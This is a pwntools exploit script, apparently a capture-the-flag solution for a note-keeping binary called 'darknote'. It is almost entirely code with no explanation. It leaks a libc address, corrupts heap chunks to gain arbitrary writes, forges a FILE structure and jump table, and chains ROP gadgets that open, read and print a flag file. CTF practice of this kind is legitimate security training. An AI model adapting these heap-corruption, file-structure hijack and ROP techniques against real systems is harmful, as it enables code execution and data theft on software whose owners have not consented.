1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145
| from pwn import *
io = process('./darknote') elf = ELF('darknote', checksec = False) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec = False) context.binary = 'darknote'
rc = lambda n : io.recv(n) ru = lambda x : io.recvuntil(x, drop = True) sa = lambda a, b : io.sendafter(a, b) sla = lambda a, b : io.sendlineafter(a, b) ia = lambda : io.interactive() uu64 = lambda x : u64(x.ljust(8, '\x00')) libc_os = lambda x : libc_base + x libc_sym = lambda x : libc_os(libc.sym[x])
def menu(choice): sla('>> ', str(choice))
def add(idx, content): menu(1) sla('Index: ', str(idx)) sa('Note: ', content)
sla('How many dark notes do you want?\n', str(0x61000000)) pld = flat([ 0, 0x71, 0x0000000000404250-0x10 ]) add(0x103db75, pld + '\n') add(0, 'a\n') pld = flat({0x10: 0x0000000000403FD0}, filler = '\x00') add(1, pld + '\n') ru('==================================\n') libc_base = uu64(rc(6)) - libc.sym['malloc'] file_addr = 0x00000000004042A0 + 0x300 pld = flat([ 0, 0x71, file_addr+0x88-0x10 ]) add(0x103db75, pld + '\n') add(0, 'a\n') jump_table = libc_os(0x7fa5480e6f60-0x7fa547efe000) pld = flat({ 0: file_addr-0x10, 0x18: file_addr, 0x50: jump_table, 0x58: file_addr + 0x88 + 0x10 }, filler = '\x00') add(1, pld + '\n')
pld = flat([ 0, 0x71, file_addr+0x88-0x10-0x10+0x88 ]) add(0x103db75, pld + '\n') add(0, 'a\n') gadgets = libc_os(0x0000000000154DEA) pld = flat(gadgets) add(1, pld + '\n')
pld = flat([ 0, 0x71, file_addr-0x10 ]) add(0x103db75, pld + '\n') add(0, 'a\n') gadgets = libc_os(0x0000000000154DEA) leave = libc_os(0x00000000000578c8) pop_rdi = libc_os(0x0000000000023b6a) pop_rsi = libc_os(0x000000000002601f) pop_rdx = libc_os(0x0000000000142c92) pop_rbp = libc_os(0x00000000000226c0) pop_rax = libc_os(0x0000000000036174) syscall = libc_os(0x00000000000630a9) write_addr = libc_sym('write') read_addr = libc_sym('read') rop_addr = file_addr + 0x100 + 0x10 pop2 = libc_os(0x0000000000023b68) rop_addr1 = rop_addr + 0x100 rop_chain = flat([ rop_addr1 - 8, pop2, 0, rop_addr, pop_rdi, leave, pop_rax, 2, pop_rdi, file_addr + 0x58, syscall, leave, ]) pld = flat({ 0x48: rop_addr, 0x58: 'flag\x00' }, filler = '\x00') add(1, pld + '\n')
pld = flat([ 0, 0x71, rop_addr - 0x10, ]) add(0x103db75, pld + '\n') add(0, 'a\n') add(1, rop_chain + '\n')
rop_chain = flat([ pop_rdi, 3, pop_rsi, file_addr - 0xa0, pop_rdx, 0x30, read_addr, pop_rdi, 1, write_addr ]) pld = flat([ 0, 0x71, rop_addr1 - 0x10, ]) add(0x103db75, pld + '\n') add(0, 'a\n') add(1, rop_chain + '\n')
pld = flat([ 0, 0x71, 0x00000000004042A0-0x10-0x10, ]) add(0x103db75, pld + '\n') add(0, 'a\n') pld = flat({0x10: file_addr}, filler = '\x00') add(1, pld + '\n') ia()
|